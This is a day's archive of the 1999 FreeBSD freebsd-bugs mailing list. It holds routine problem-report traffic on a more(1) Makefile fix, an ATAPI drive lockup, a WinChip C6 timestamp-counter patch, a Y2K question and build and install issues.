majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Sep 10 0:30:30 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 72B9014C8F for ; Fri, 10 Sep 1999 00:30:28 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id AAA79168; Fri, 10 Sep 1999 00:30:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Date: Fri, 10 Sep 1999 00:30:02 -0700 (PDT) Message-Id: <199909100730.AAA79168@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Sheldon Hearn Subject: Re: bin/13676: usr.bin/more/Makefile is broken Reply-To: Sheldon Hearn Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/13676; it has been noted by GNATS. From: Sheldon Hearn To: wollman@khavrinen.lcs.mit.edu Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: bin/13676: usr.bin/more/Makefile is broken Date: Fri, 10 Sep 1999 09:26:14 +0200 On Thu, 09 Sep 1999 23:50:40 -0400, Garrett Wollman wrote: > more's Makefile erroneously uses ${ECHO} Why is it erroneous? > - @${ECHO} '#define DEFRC "\' >> ${.TARGET} > + echo '#define DEFRC "\' >> ${.TARGET} Okay, so you want the echo commands to be displayed. What else is wrong with using just ${ECHO} ? Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Sep 10 0:41:41 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id B2BE014F0C; Fri, 10 Sep 1999 00:41:40 -0700 (PDT) (envelope-from ru@FreeBSD.org) Received: (from ru@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id AAA80619; Fri, 10 Sep 1999 00:41:07 -0700 (PDT) (envelope-from ru@FreeBSD.org) Date: Fri, 10 Sep 1999 00:41:07 -0700 (PDT) From: Message-Id: <199909100741.AAA80619@freefall.freebsd.org> To: wollman@khavrinen.lcs.mit.edu, ru@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/13676: usr.bin/more/Makefile is broken Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: usr.bin/more/Makefile is broken State-Changed-From-To: open->closed State-Changed-By: ru State-Changed-When: Fri Sep 10 00:39:57 PDT 1999 State-Changed-Why: Identical patch applied. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Sep 10 0:50:16 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 74D6F14F0C for ; Fri, 10 Sep 1999 00:50:15 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id AAA81340; Fri, 10 Sep 1999 00:50:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Date: Fri, 10 Sep 1999 00:50:01 -0700 (PDT) Message-Id: <199909100750.AAA81340@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Sheldon Hearn Subject: Re: bin/13676: usr.bin/more/Makefile is broken Reply-To: Sheldon Hearn Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/13676; it has been noted by GNATS. From: Sheldon Hearn To: Ruslan Ermilov Cc: freebsd-gnats-submit@freebsd.org Subject: Re: bin/13676: usr.bin/more/Makefile is broken Date: Fri, 10 Sep 1999 09:42:22 +0200 On Fri, 10 Sep 1999 10:38:08 +0300, Ruslan Ermilov wrote: > Because ${ECHO} == "true" in `make -s' case, see /usr/share/mk/bsd.sys.mk. Knew there must be something. ;-) Thanks, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Sep 10 1: 1: 2 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C510B14F0C for ; Fri, 10 Sep 1999 01:01:00 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA81960; Fri, 10 Sep 1999 01:00:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Date: Fri, 10 Sep 1999 01:00:01 -0700 (PDT) Message-Id: <199909100800.BAA81960@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Ruslan Ermilov Subject: Re: bin/13676: usr.bin/more/Makefile is broken Reply-To: Ruslan Ermilov Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/13676; it has been noted by GNATS. From: Ruslan Ermilov To: Sheldon Hearn Cc: freebsd-gnats-submit@freebsd.org Subject: Re: bin/13676: usr.bin/more/Makefile is broken Date: Fri, 10 Sep 1999 10:47:12 +0300 On Fri, Sep 10, 1999 at 09:42:22AM +0200, Sheldon Hearn wrote: > > > On Fri, 10 Sep 1999 10:38:08 +0300, Ruslan Ermilov wrote: > > > Because ${ECHO} == "true" in `make -s' case, see /usr/share/mk/bsd.sys.mk. > > Knew there must be something. ;-) > Except it is in /usr/share/mk/sys.mk :-! -- Ruslan Ermilov Sysadmin and DBA of the ru@ucb.crimea.ua United Commercial Bank, ru@FreeBSD.org FreeBSD committer, +380.652.247.647 Simferopol, Ukraine http://www.FreeBSD.org The Power To Serve http://www.oracle.com Enabling The Information Age To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Sep 10 1:10: 8 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D279F14E5C for ; Fri, 10 Sep 1999 01:10:06 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA82721; Fri, 10 Sep 1999 01:10:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Date: Fri, 10 Sep 1999 01:10:01 -0700 (PDT) Message-Id: <199909100810.BAA82721@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Sheldon Hearn Subject: Re: bin/13676: usr.bin/more/Makefile is broken Reply-To: Sheldon Hearn Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/13676; it has been noted by GNATS. From: Sheldon Hearn To: Ruslan Ermilov Cc: freebsd-gnats-submit@freebsd.org Subject: Re: bin/13676: usr.bin/more/Makefile is broken Date: Fri, 10 Sep 1999 09:50:58 +0200 On Fri, 10 Sep 1999 10:47:12 +0300, Ruslan Ermilov wrote: > Except it is in /usr/share/mk/sys.mk :-! Yah? So where does bsd.prog.mk get sucked in via bsd.prog.mk? Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Sep 10 1:29: 8 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from relay.ucb.crimea.ua (relay.ucb.crimea.ua [212.110.138.1]) by hub.freebsd.org (Postfix) with ESMTP id C148415716 for ; Fri, 10 Sep 1999 01:28:33 -0700 (PDT) (envelope-from ru@ucb.crimea.ua) Received: (from ru@localhost) by relay.ucb.crimea.ua (8.9.3/8.9.3/UCB) id LAA87873; Fri, 10 Sep 1999 11:25:31 +0300 (EEST) (envelope-from ru) Date: Fri, 10 Sep 1999 11:25:31 +0300 From: Ruslan Ermilov To: Sheldon Hearn Cc: freebsd-bugs@FreeBSD.ORG Subject: Re: bin/13676: usr.bin/more/Makefile is broken Message-ID: <19990910112531.A77649@relay.ucb.crimea.ua> Mail-Followup-To: Sheldon Hearn , freebsd-bugs@FreeBSD.ORG References: <199909100810.BAA82721@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.3i In-Reply-To: <199909100810.BAA82721@freefall.freebsd.org>; from Sheldon Hearn on Fri, Sep 10, 1999 at 01:10:01AM -0700 X-Operating-System: FreeBSD 3.2-STABLE i386 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Sep 10, 1999 at 01:10:01AM -0700, Sheldon Hearn wrote: > The following reply was made to PR bin/13676; it has been noted by GNATS. > > From: Sheldon Hearn > To: Ruslan Ermilov > Cc: freebsd-gnats-submit@freebsd.org > Subject: Re: bin/13676: usr.bin/more/Makefile is broken > Date: Fri, 10 Sep 1999 09:50:58 +0200 > > On Fri, 10 Sep 1999 10:47:12 +0300, Ruslan Ermilov wrote: > > > Except it is in /usr/share/mk/sys.mk :-! > > Yah? So where does bsd.prog.mk get sucked in via bsd.prog.mk? > I don't quite understand your question... If you question actually was "So where does sys.mk get sucked in via bsd.prog.mk?", then the answer is: "sys.mk is always included first". /usr/share/mk/bsd.README: :The include file has the default rules for all makes, in the BSD :environment or otherwise. You probably don't want to touch this file. make(1): :-m directory : Specify a directory in which to search for sys.mk and makefiles : included via the <...> style. -- Ruslan Ermilov Sysadmin and DBA of the ru@ucb.crimea.ua United Commercial Bank, ru@FreeBSD.org FreeBSD committer, +380.652.247.647 Simferopol, Ukraine http://www.FreeBSD.org The Power To Serve http://www.oracle.com Enabling The Information Age To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Sep 10 2: 2: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 350BC1500A for ; Fri, 10 Sep 1999 02:02:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA87916; Fri, 10 Sep 1999 02:00:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Date: Fri, 10 Sep 1999 02:00:02 -0700 (PDT) Message-Id: <199909100900.CAA87916@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Dan Lukes Subject: Re: conf/13652: Bug in /etc/protocols, update request. Reply-To: Dan Lukes Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR conf/13652; it has been noted by GNATS. From: Dan Lukes To: freebsd-gnats-submit@freebsd.org, Bill Fenner Cc: Subject: Re: conf/13652: Bug in /etc/protocols, update request. Date: Fri, 10 Sep 1999 10:48:03 +0200 I'm sorry I'm not check it first. So, let's add the protocols 122-128 only and close this report. Dan -- Dan Lukes tel: +420 2 24102474, fax: +420 2 24102301 root, postmaster (and *master) of FIONet, webmaster of KolejNET Administrator of www.antispam.cz's spammer blacklist AKA: dan@obluda.cz, dan@freebsd.cz, dan@kolej.mff.cuni.cz To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Sep 10 4: 1:40 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 02C3814BC7 for ; Fri, 10 Sep 1999 04:01:36 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id EAA96329; Fri, 10 Sep 1999 04:00:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from sevasoft.alex-ua.com (sevasoft.alex-ua.com [195.123.18.144]) by hub.freebsd.org (Postfix) with ESMTP id C7AB814BC7 for ; Fri, 10 Sep 1999 03:56:17 -0700 (PDT) (envelope-from seva@sevasoft.alex-ua.com) Received: (from seva@localhost) by sevasoft.alex-ua.com (8.9.3/8.9.3) id NAA71898; Fri, 10 Sep 1999 13:56:10 +0300 (EEST) (envelope-from seva) Message-Id: <199909101056.NAA71898@sevasoft.alex-ua.com> Date: Fri, 10 Sep 1999 13:56:10 +0300 (EEST) From: Vsevolod Lobko Reply-To: seva@sevasoft.alex-ua.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: kern/13678: hard lockup's on tsleep in atapi_queue_cmd called at splbio from afd_start from afd_strategy Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 13678 >Category: kern >Synopsis: hard lockup's on tsleep in atapi_queue_cmd called at splbio from afd_start from afd_strategy >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Sep 10 04:00:01 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Vsevolod Lobko >Release: FreeBSD 4.0-CURRENT i386 >Organization: None >Environment: FreeBSD sevasoft.alex-ua.com 4.0-CURRENT FreeBSD 4.0-CURRENT #38: Fri Sep 3 09:38:46 EEST 1999 root@sevasoft.alex-ua.com:/usr/src/sys/compile/SEVASOFT i386 >Description: I'm trying to get working Fujitsu ATAPI MO drive, using atapi-fd driver from new-ata Drive in general working fine, but sometime machine hard locks on drive access Using NMI, i get kernel debugger prompt, and ps show mount process sleeping on "atprq", stack trace of process show sequence of calls afdstrategy->afd_start->atapi_queue_cmd->tsleep Unfortunately serial console does not work in this case, so I can't attach precise stack trace >How-To-Repeat: Machine hard locks after several mount_msdos /dev/afd0 /ftp/data umount /ftp/data especially with concurent serial port activity (may be any interrupt activity) >Fix: may be by inserting splx() before queue_atapi_cmd ()? atapi_queue_cmd do own splbio()/splx() locking >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Sep 10 4:46: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 418F714E8F; Fri, 10 Sep 1999 04:46:03 -0700 (PDT) (envelope-from sheldonh@FreeBSD.org) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id EAA03459; Fri, 10 Sep 1999 04:45:52 -0700 (PDT) (envelope-from sheldonh@FreeBSD.org) Date: Fri, 10 Sep 1999 04:45:52 -0700 (PDT) From: Message-Id: <199909101145.EAA03459@freefall.freebsd.org> To: sheldonh@FreeBSD.org, freebsd-bugs@FreeBSD.org, sos@FreeBSD.org Subject: Re: kern/13678: hard lockup's on tsleep in atapi_queue_cmd called at splbio from afd_start from afd_strategy Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: hard lockup's on tsleep in atapi_queue_cmd called at splbio from afd_start from afd_strategy Responsible-Changed-From-To: freebsd-bugs->sos Responsible-Changed-By: sheldonh Responsible-Changed-When: Fri Sep 10 04:34:54 PDT 1999 Responsible-Changed-Why: Over to the new atapi driver's author. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Sep 10 8:15:47 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from mail.fleishman.com (mail.fleishman.com [207.193.111.249]) by hub.freebsd.org (Postfix) with ESMTP id C35E514CCA for ; Fri, 10 Sep 1999 08:15:40 -0700 (PDT) (envelope-from holtgrew@fleishman.com) Received: from imcbdcsrv01.fleishman.com ([207.193.111.47]) by mail.fleishman.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2607.0) id STYC7DTA; Fri, 10 Sep 1999 10:11:20 -0500 Received: by imcbdcsrv01 with Internet Mail Service (5.5.2448.0) id ; Fri, 10 Sep 1999 10:14:32 -0500 Message-ID: <951B30EE47A7D2118D4000A0C9EA357301649920@STLEXGSRV01> From: "Holtgreive, William" To: "'freebsd-bugs@FreeBSD.ORG'" Subject: BSD Y2K Date: Fri, 10 Sep 1999 10:14:27 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2448.0) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, If we are using BSD 2.1 and install all 2.x applicable Y2K patches... can we assume the O/S is compliant or do we need to be on a 3.x version? Thanks Fleishman-Hillard Bill Holtgreive Systems Administrator 200 North Broadway St. Louis MO 63102 314.982.9146 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Sep 10 9:20:17 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7C39815C76 for ; Fri, 10 Sep 1999 09:20:14 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA75738; Fri, 10 Sep 1999 09:20:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from shrike.dti.ad.jp (shrike.dti.ad.jp [202.216.224.144]) by hub.freebsd.org (Postfix) with ESMTP id D235C151C7 for ; Fri, 10 Sep 1999 09:14:00 -0700 (PDT) (envelope-from take-i@ceres.dti.ne.jp) Received: from klein2 (PPP139.tama-ap5.dti.ne.jp [210.170.192.193]) by shrike.dti.ad.jp (8.9.3/3.7W) with ESMTP id BAA07495 for ; Sat, 11 Sep 1999 01:13:51 +0900 (JST) Received: by klein2 (8.9.3/3.7W98101921) id BAA40242; Sat, 11 Sep 1999 01:13:53 +0900 (JST) Message-Id: <14297.11837.223378.78879Z@cerse.dti.ne.jp> Date: Sat, 11 Sep 1999 01:13:49 +0900 From: IMAI Takeshi To: FreeBSD-gnats-submit@freebsd.org Subject: i386/13683: WinChip C6's TSC is broken. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 13683 >Category: i386 >Synopsis: WinChip C6's TSC is broken. >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Sep 10 09:20:01 PDT 1999 >Closed-Date: >Last-Modified: >Originator: IMAI Takeshi >Release: FreeBSD 4.0-CURRENT i386 >Organization: >Environment: FreeBSD tsugumi 4.0-CURRENT FreeBSD 4.0-CURRENT #0: Sat Sep 4 15:56:09 JST 1999 root@tsugumi:/usr/src/sys/compile/TSUGUMI i386 >Description: System clock don't update, because C6's TSC stop count up when run HALT instruction. See more infomation C6 Processor data book . >How-To-Repeat: >Fix: Index: identcpu.c =================================================================== RCS file: /ext/ncvs/current/src/sys/i386/i386/identcpu.c,v retrieving revision 1.73 diff -u -p -r1.73 identcpu.c --- identcpu.c 1999/08/28 00:43:44 1.73 +++ identcpu.c 1999/09/10 15:38:01 @@ -476,6 +476,7 @@ printcpuinfo(void) switch (cpu_id & 0xff0) { case 0x540: strcat(cpu_model, "WinChip C6"); + tsc_is_broken = 1; break; case 0x580: strcat(cpu_model, "WinChip 2"); >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Sep 10 10:30: 9 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8191B14E2B for ; Fri, 10 Sep 1999 10:30:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA83703; Fri, 10 Sep 1999 10:30:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Date: Fri, 10 Sep 1999 10:30:02 -0700 (PDT) Message-Id: <199909101730.KAA83703@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Oliver Schonefeld Subject: Re: kern/8973: trap 12: page fault while in kernel mode while trying installation w/ boot.flp Reply-To: Oliver Schonefeld Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/8973; it has been noted by GNATS. From: Oliver Schonefeld To: freebsd-gnats-submit@freebsd.org Cc: Nick Hibma Subject: Re: kern/8973: trap 12: page fault while in kernel mode while trying installation w/ boot.flp Date: Fri, 10 Sep 1999 19:23:38 +0200 (MET DST) well, after a very long time, i have found time to install freebsd 3.2-release on that compaq machine ... well, that should i say, i worked right out of the box. i used the two 1.44 mb bootdisk and even when not disabling unneeded device drivers, freebsd boots without any problem. there may be a problem on the old compaq machines, if some network card use irq 9, so using this interrupt should be avoided. current configiartion: compaq prosignia 486 w/pentium overdrive 88 mb ram 1x adaptec aha-2742T scsi host adapter (w/floppy diabled) 1x adaptec aha-1740 scsi host adapter 2x 3com 3c579 etherlink iii NICs i am using softuddates and vinum (one volume striped over four disks, one volume mirrored, 2 disks) and the system runs stable, therefore i think this problem report can be closed. so long, olli > > > Which image did you use? By chance the boot.flp? That one is > > > for 2.88Mbyte floppy drives. > > no, i used the 1.44 floppy images. the same disks worked for an other > > machine without any problems (Dual P166MMX, Gigabyte DX, 128 MB, Adaptec > > 2940US onboard). > > after changing the nics irq and disabling a lot of device drives in the boot > > kernel the machine managed to boot and i was able to install the os. > > but it ran rather unstable with 3.0 release and i experienced bad network > > performance with the two 3com 3c579 nics and the vinum driver crashed the > > machine serveral times. > > > > > Could you do us a favour and try again on that specific machine and boot > > > with two boot floppies created from kern.flp and mfsroot.flp for version > > > 3.2-RELEASE > > i will do that. i just recieved the freebsd cdroms w/release 3.2. i hope i > > find the time to put freebsd on that machine next week. > > > > > If you have a 2.88Mbyte floppy drive, also with the boot.flp? > > sorry, i do not have such a floppy drive > > > > > Thanks a lot in advance. > > no problem ... i love freebsd and will help, where i can. > > > > so long, > > oliver To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Sep 10 12:20: 9 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id B615C14F22 for ; Fri, 10 Sep 1999 12:20:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA98597; Fri, 10 Sep 1999 12:20:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Date: Fri, 10 Sep 1999 12:20:02 -0700 (PDT) Message-Id: <199909101920.MAA98597@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Jasper O'Malley" Subject: Re: bin/12847 Reply-To: "Jasper O'Malley" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/12847; it has been noted by GNATS. From: "Jasper O'Malley" To: freebsd-gnats-submit@freebsd.org Cc: Subject: Re: bin/12847 Date: Fri, 10 Sep 1999 15:11:59 -0400 (EDT) Could someone please make sure the patch in this PR is committed before 3.3 is released? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Sep 10 13:48:44 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7AA3F15F87; Fri, 10 Sep 1999 13:47:52 -0700 (PDT) (envelope-from phk@FreeBSD.org) Received: (from phk@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA09512; Fri, 10 Sep 1999 13:47:52 -0700 (PDT) (envelope-from phk@FreeBSD.org) Date: Fri, 10 Sep 1999 13:47:52 -0700 (PDT) From: Message-Id: <199909102047.NAA09512@freefall.freebsd.org> To: take-i@ceres.dti.ne.jp, phk@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: i386/13683: WinChip C6's TSC is broken. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: WinChip C6's TSC is broken. State-Changed-From-To: open->closed State-Changed-By: phk State-Changed-When: Fri Sep 10 13:47:31 PDT 1999 State-Changed-Why: committed, thanks! (And will make it in 3.3 :-) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Sep 10 13:54:11 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7248E14CF1; Fri, 10 Sep 1999 13:54:10 -0700 (PDT) (envelope-from torstenb@FreeBSD.org) Received: (from torstenb@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA11946; Fri, 10 Sep 1999 13:54:10 -0700 (PDT) (envelope-from torstenb@FreeBSD.org) Date: Fri, 10 Sep 1999 13:54:10 -0700 (PDT) From: Message-Id: <199909102054.NAA11946@freefall.freebsd.org> To: torstenb@FreeBSD.org, torstenb@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: ports/8829: bug in innetgr (was: Fix port: security/ssh) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Old Synopsis: Fix port: security/ssh New Synopsis: bug in innetgr (was: Fix port: security/ssh) Responsible-Changed-From-To: torstenb->freebsd-bugs Responsible-Changed-By: torstenb Responsible-Changed-When: Fri Sep 10 13:51:01 PDT 1999 Responsible-Changed-Why: as noted by billf and others (see audit-trail) it's a problem with NIS and not with ssh itself. As I don't use NIS (or even know the code good enough to fix the problem) I'll asign that back to freebsd-bugs To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Sep 10 14:30: 9 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4E63C14CFD for ; Fri, 10 Sep 1999 14:30:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA22808; Fri, 10 Sep 1999 14:30:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Date: Fri, 10 Sep 1999 14:30:03 -0700 (PDT) Message-Id: <199909102130.OAA22808@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Julian Elischer Subject: Re: bin/13039: make cannot find archive members Reply-To: Julian Elischer Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/13039; it has been noted by GNATS. From: Julian Elischer To: freebsd-gnats-submit@freebsd.org, mikko@dynas.se Cc: Subject: Re: bin/13039: make cannot find archive members Date: Fri, 10 Sep 1999 14:29:48 -0700 I have checked this change into -current. I will wait a little before adding it to 3.x julian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Sep 10 14:40: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7BDBB152AF for ; Fri, 10 Sep 1999 14:40:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA24507; Fri, 10 Sep 1999 14:40:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Date: Fri, 10 Sep 1999 14:40:01 -0700 (PDT) Message-Id: <199909102140.OAA24507@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Julian Elischer Subject: Re: bin/13039: make cannot find archive members Reply-To: Julian Elischer Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/13039; it has been noted by GNATS. From: Julian Elischer To: freebsd-gnats-submit@freebsd.org, mikko@dynas.se Cc: Subject: Re: bin/13039: make cannot find archive members Date: Fri, 10 Sep 1999 14:31:07 -0700 I believe 10274 is a different problem.. This fix doesn't seem to affect that. julian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Sep 10 15: 9:21 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from dt011n65.san.rr.com (dt014nb6.san.rr.com [24.30.129.182]) by hub.freebsd.org (Postfix) with ESMTP id 5A6DD150DE for ; Fri, 10 Sep 1999 15:09:18 -0700 (PDT) (envelope-from Doug@gorean.org) Received: from gorean.org (master [10.0.0.2]) by dt011n65.san.rr.com (8.9.3/8.8.8) with ESMTP id PAA76074; Fri, 10 Sep 1999 15:09:13 -0700 (PDT) (envelope-from Doug@gorean.org) Message-ID: <37D98188.F88D800@gorean.org> Date: Fri, 10 Sep 1999 15:09:12 -0700 From: Doug Organization: Triborough Bridge & Tunnel 